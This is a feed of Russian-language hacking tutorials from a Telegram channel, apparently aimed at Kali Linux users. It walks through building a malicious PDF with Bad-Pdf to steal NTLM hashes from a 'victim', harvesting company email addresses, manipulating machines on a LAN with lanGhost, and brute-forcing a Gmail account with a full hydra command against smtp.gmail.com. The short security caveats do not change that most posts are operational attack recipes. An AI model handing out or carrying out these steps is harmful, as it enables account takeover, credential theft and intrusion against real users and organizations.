CODE RED
9.17K subscribers
9 photos
2 videos
1.1K links
Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки.

Обратная связь: @encryptedadm
Download Telegram
​​Как сбросить root пароль Kali Linux без аутентификации

Операционная система Linux спроектирована с ориентиром на максимальную безопасность, поэтому в ней у каждого пользователя есть пароль. Процессы аутентификации и смены пароля лежат на уровне системы.

Поэтому, если вы забыли root пароль на Kali Linux (либо вовсе никогда его и не знали), для начала необходимо запустить систему и дождаться открытия GNU GRUB.

Затем нужно нажать на 'E' тем самым открыв конфиг загрузчика.

В открывшимся окне нужно найти строку, которая начинается на linux /boot/vmlinuz-3.18. В конце неё нужно поставить пробел, вписать single init=/bin/bash и нажать F10.

Откроется терминал. В нем нужно сначала перемонтировать систему на чтение-запись командой

mount -rw -o remount /

Потом просто вводим команду

passwd root

И прописываем два раза новый пароль. После подтверждения можно сделать перезапуск командой

shutdown -h now

Готово! Новый пароль установлен.

#kali #хитрости
​​Заражаем PDF-файл

Опасные PDF уже научились распознавать некоторые популярные антивирусы. Но опять же, не все, и чтобы стопроцентно обезопасить открытие подобного файла, лучше использовать конверторы, к примеру, Dangerzone (подробнее о нем в следующих постах).

Для демонстрации метода заражения воспользуемся утилитой Bad-Pdf. Она создает вредоносный PDF и открывает для него сессию. То есть если кто-то откроет этот файл, злоумышленнику моментально придут NTML хеши.

Установка

Устанавливаем Kali Linux.

Скачиваем репозиторий командой

git clone https://github.com/deepzec/Bad-Pdf.git

Переходим в папку и ставим права на файл эксплоита командами

cd Bad-pdf/

chmod +x badpdf.py

Использование

Процесс создания вредоносного PDF максимально простой. Нужно только запустить скрипт

python badpdf.py

В папке с программой создастся тот самый файл. Остается только отправить его потенциальной жертве. Что самое интересное, данный способ пока актуален для всех версий Adobe Acrobat.

#хакинг #kali
Автоматизация OSINT

При проведении OSINT(разведки на основе открытых источников) для анализа безопасности определённой системы часто приходится использовать огромное количество различных ресурсов: whois лукапы, сканеры портов и т.д. Это особо неудобно при анализе большого количества систем.

Утилита Magnifier помогает справиться с подобной проблемой. Она представляет из себя сборник большого количества OSINT инструментов. В одном окне терминала можно сканировать порты, узнавать расположение сервера, читать robots.txt и многое другое.

Установка

Скачиваем репозиторий с github

git clone https://github.com/TheEyeOfCyber/Magnifier.git

Переходим в папку и ставим права исполняемому файлу

cd Magnifier

chmod +x magnifier.py

Использование

Запускаем эксплоит командой

python2 magnifier.py

Далее перед нами откроется интуитивно понятное меню. Каждая функция соответствует цифре и после выполнения не завершает сам процесс Magnifier, что позволяет получив информацию от DNS Lookup, к примеру, мгновенно переходить к сканированию портов.

#kali #OSINT
​​Поиск скрытых директорий на вебресурсе

Неправильная конфигурация сайта ведет к многочисленным уязвимостям, которые могут привести к утечке данных пользователей. Подобные проблемы часто встречаются при использовании различных CMS, особенно старых версий.

Таким образом неправильно настроенный ресурс легко поддается фаззингу. Фаззинг - это техника тестирования ПО, основной задачей которой является поиск необходимой информации путем передачи различных случайных данных.

Конкретно Wscan ищет скрытые директории и файлы, последующий анализ которых поможет злоумышленнику обнаружить уязвимости.

Установка

Устанавливаем Kali Linux.

Скачиваем репозиторий с github

◽️git clone https://github.com/Testzero-wz/wscan.git

Переходим в папку и запускаем установщик

◽️cd wscan
◽️python3 -m pip install wscan

Использование

Стандартный фаззинг Wscan запускается в одну строчку

◽️wscan -u "http://www.example.com/" -f -m

Если вписать wscan --help и прочитать справку, можно узнать что вышепредставленная команда сканирует url по словарям, проверяет ссылки и строит карту сайта.

Когда процесс завершится в логах можно будет найти админку сайта, robot.txt, различные JS скрипты и т.д. Злоумышленнику остается только тщательно проанализировать их и в случае нахождения уязвимости начать атаку.

#хакинг #kali
​​Поиск email адресов

Для социального инженера знание email сотрудника может быть основой для атаки на определенную организацию. Поэтому следует тщательно скрывать корпоративные почты или ограничивать прием сообщений на них с помощью фильтров, т.к. фишинговое письмо с подменой адреса отправителя неподготовленному пользователю идентифицировать сложно.

Для демонстрации поиска email адресов компании воспользуемся утилитой Samurai Email Discovery. Она способна искать по названию предприятия, доркам Google и домену.

Установка

Скачиваем репозиторий

◽️git clone https://github.com/0x3curity/Samurai

Далее нужно будет установить Lynx командой

◽️apt install lynx

И поставить права на исполняемый файл

◽️chmod +x samurai.sh

Использование

Запускаем программу командой

◽️./samurai.sh

Перед нами появится меню, где можно будет выбрать тип поиска. Вводим соответствующую цифру, к примеру 3. Вводим название компании, и получаем список найденных корпоративных почт.

#OSINT #kali
​​Проверка почты на предмет взлома

Инструмент PwnedOrNot позволяет узнать была ли ваша почта скомпрометирована. Апеллируя к базе из сотен утечек, скрипт пытается найти предоставленный ему email, и в случае подтверждения выдает все возможные вариации паролей.

Установка

Помимо Kali Linux, PwnedOrNot работает также и на Termux. Рассмотрим сначала установку на Kali, для этого нужно скачать репозиторий. Прописываем

◽️git clone https://github.com/thewhiteh4t/pwnedOrNot.git

Далее устанавливаем необходимый модуль Python

◽️pip install cfscrape

Готово. Для Termux установим для начала Python и Git

◽️pkg install python2
◽️pkg install git

Далее необходимые модули

◽️pip2 install requests
◽️pip2 install cfscrape

И в итоге скачаем репозиторий с github

◽️git clone https://github.com/thewhiteh4t/pwnedOrNot.git

Использование

PwnedOrNot максимально прост в использовании. Для начала процесса проверки запускаем скрипт командой

◽️python pwnedornot.py

Это как для Kali, так и для Termux. Далее остается только ввести почту и ждать завершения процесса. Если поиск пройдет удачно, в терминале появится список паролей, которые могут быть связаны со сканируемым адресом.

#kali #хакинг
​​Сборник OSINT инструментов

Сборники инструментов предназначенных для определенного спектра атак давно стали основной составляющей базового набора для пентеста. Сюда можно добавить и фреймворк The Inspector, который включает в себя модули для получения информации о телефоне либо о домене, обхода CloudFlare и т.д.

Установка

Устанавливаем Kali Linux.

Скачиваем репозиторий с github

◽️git clone https://github.com/Moham3dRiahi/Th3inspector

Переходим в директорию с The Inspector, ставим права на установщик и запускаем его

◽️cd Th3inspector
◽️chmod +x install.sh && ./install.sh

Использование

Запускаем The Inspector командой

◽️perl Th3inspector.pl

Теперь можно выбрать интересующую функцию, вписав её номер. К примеру для получения информации о сайте вводим 1 и потом домен. Как итог получаем списком данные геолокации хостера, ip и т.д.

#kali #OSINT
​​Манипулирование компьютерами в локальной сети

Даже в локальных сетях не стоит пренебрегать безопасностью. Это в большей степени касается предприятий с обширными корпоративными сетями. Возможность локально подключиться и манипулировать компьютером определенного сотрудника может привести к утечкам информации. Мало того многие атаки на корпорации не обходятся без распространения вредоносного ПО по локальной сети, поскольку проще взломать один ПК и через него получить доступ ко всем остальным.

Инструмент lanGhost создан как раз таки для управления локальной сетью. В его функционал входит: отключение интернета у целевого узла, замена всех картинок на веб-ресурсе, MITM и т.д. Реализация представляет собой программу на Python с панелью управления в виде бота Телеграм.

Установка

Устанавливаем Kali Linux.

Обновляем репозитории

◽️apt-get update –y && apt-get upgrade –y && apt-get dist-upgrade

Устанавливаем Python 3

◽️apt-get install python3 python3-pip

Скачиваем репозиторий

◽️git clone https://github.com/xdavidhu/lanGhost

Переходим в директорию и запускаем установщик

◽️cd LanGhost/
◽️./setup.py

Настройка

Далее надо настроить lanGhost в 4 этапа. В первом надо просто согласиться. Во втором вписать API созданного Телеграм бота, и соответственно в третьем вписать проверочный код, который придет сразу же после второго шага. На четвертом этапе достаточно также все оставить по стандарту.

Готово! Теперь прописывая команды боту, вы сможете управлять узлами в локальной сети, к которой подключены.

#kali
​​Как создать свой сайт в сети TOR с помощью Kali Linux

Практически каждый знает о теневом браузере TOR, который защищает пользователей путем скрытия всех основных данных и открывает доступ к сайтам в доменной зоне .onion. Эти сайты в основном используются для незаконной деятельности, но помимо этого в списке вебресурсов даркнета можно также найти различные информационные форумы, библиотеки, оппозиционные порталы и т.д.

Как подключиться к такому сайту знают многие, но как он функционирует и как его создать не все. Разберем детально этот процесс.

Установка компонентов

Для начала потребуется установить старую версию Kali Linux, к примеру 1.0.6.

Далее устанавливаем и распаковываем Shallot

◽️wget https://github.com/katmagic/Shallot/archive/master.zip
◽️unzip master.zip

Переходим в созданную директорию и запускаем сборку командами

◽️cd Shallot-master
◽️./configure
◽️make

Теперь установим непосредственно Tor и lighttpd

◽️apt-get install tor
◽️apt-get install lighttpd

Настройка

На данном этапе нужно сначала получить домен. Делается это командой

◽️./shallot ^codered

Создастся что-то на подобии coderedkpdsto4wxhr.onion и приватный ключ к нему. Вместо codered можно вставить любое название.

Далее запускаем Tor и lighttpd

◽️service tor start
◽️service lighttpd start

В файле /etc/tor/torrc нужно будет добавить такие строки

◽️HiddenServiceDir /var/lib/tor/hidden_service/
◽️HiddenServicePort 80 127.0.0.1:8080

В последней вместо локального ip можно внести внешний. Также желательно добавить эту строку

◽️ExcludeNodes {ru}, {ua}, {be}

Теперь по пути /var/lib/tor/hiddenservice в файл hostname нужно вписать полученный ранее домен, а в privatekey - приватный ключ.

Остается только в файле /etc/lighttpd/lighttpd.conf поменять параметры на подобные

◽️server.document-root = "/var/www/"
◽️server.error-handler-404 = "/404.html"
◽️server.tag = "Ваше значение"
◽️server.port = 8080 $HTTP["remoteip"] !~ "127.0.0.1" { url.access-deny = ( "" ) }
◽️server.dir-listing = "disable"

Почти готово, нужно только создать вебстраницы index.html и 404.html в папке /var/www/, соответственно. Теперь при переходе по сгенерированному ранее адресу будет открываться созданный сайт. Стоит добавить, что в lighttpd можно уставить множество дополнительных модулей, тем самым модифицировать сайт.

#kali #TOR
​​Взлом почты Gmail с помощью XHYDRA

Взлом почты особенно страшен тем, что через неё злоумышленник может восстановить доступ сразу к нескольким соцсетям пользователя. Поэтому лучше периодически проверять email на компрометацию в соответственных сервисах.

Сам процесс взлома может быть любым, от фишинга до брутфорса. О последнем сегодня речь и пойдет. Реализация атаки перебором для почтовых ящиков на протоколе smtp работает быстрее и стабильней, чем стандартные запросы на форму входа на сайте. Автоматизировать весь процесс будет утилита xHydra.

Использование xHydra

Поскольку xHydra уже предустановлена в Kali Linux шаг установки можно пропустить. Остается её запустить, выбрав в меню быстрого доступа "Password Attacks" раздел "Online Attacks" пункт "hydra-gtk" или просто прописав название программы в поиск.

Откроется графический интерфейс Hydra. Поскольку тестовую атаку будем проводить на адрес Gmail, то во вкладке "Target" в поля "Single Target", "Port Number" и "Protocol" вписываем значения smtp.gmail.com, 465 и smtp соответственно. Далее в разделе "Passwords" нужно указать логин атакуемого пользователя вписав его в пункт "Username". Логином выступает сама почта. В поле "Password List" нужно указать путь к словарю паролей.

Теперь остается только перейти во вкладку "Start" и нажать одноименную кнопку. Перебрав все пароли из словаря Hydra выведет результат работы. Этот способ можно также реализовать с помощью команды

◽️hydra -l <адрес gmail> -P <путь к словарю> -s 465 smtp.gmail.com smtp -v -V -f -t 1 -e nrs -S

#kali #хакинг